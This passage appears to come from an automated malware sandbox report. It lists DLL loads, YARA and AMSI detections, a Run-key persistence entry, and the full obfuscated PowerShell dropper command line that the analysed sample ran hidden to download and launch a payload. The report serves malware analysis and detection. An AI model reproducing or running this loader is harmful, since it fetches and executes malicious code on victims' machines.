                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ore.pdbarj source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 00000006.00000002.2162287230.00000000090CD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2162034809.00000000087C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1974162438.00000267C01B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fingerwork)$GLoBal:UPHhovE = [sySTEm.text.ENcoDinG]::AScii.GEtsTrinG($blIcKeY)$GlObaL:HYPERPYrAmiD=$uPHHOVE.subSTRInG($khalIL,$humDrUmNesS)<#Morgengave Eksplosionsbrand Kraps Fount U
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Vocationally $Cannellonis56 $Handwheel), (Gavstrikkenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Stockman = [AppDomain]::CurrentDomain.GetAssemblies
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Piasaba)), $Porcelainisenarm).DefineDynamicModule($slagordner, $false).DefineType($Autotypier, $Unconglomerated, [System.MulticastDele
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fingerwork)$GLoBal:UPHhovE = [sySTEm.text.ENcoDinG]::AScii.GEtsTrinG($blIcKeY)$GlObaL:HYPERPYrAmiD=$uPHHOVE.subSTRInG($khalIL,$humDrUmNesS)<#Morgengave Eksplosionsbrand Kraps Fount U
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTria
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,ms
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriaJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B6F00AD pushad ; iretd 2_2_00007FFD9B6F00C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0488371F push eax; iretd 6_2_04883759
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F52806 push ecx; ret 9_2_21F52819
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F61219 push esp; iretd 9_2_21F6121A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00414060 push eax; ret 16_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00414060 push eax; ret 16_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00414039 push ecx; ret 16_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hvidtning81Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hvidtning81Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_004047CB
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
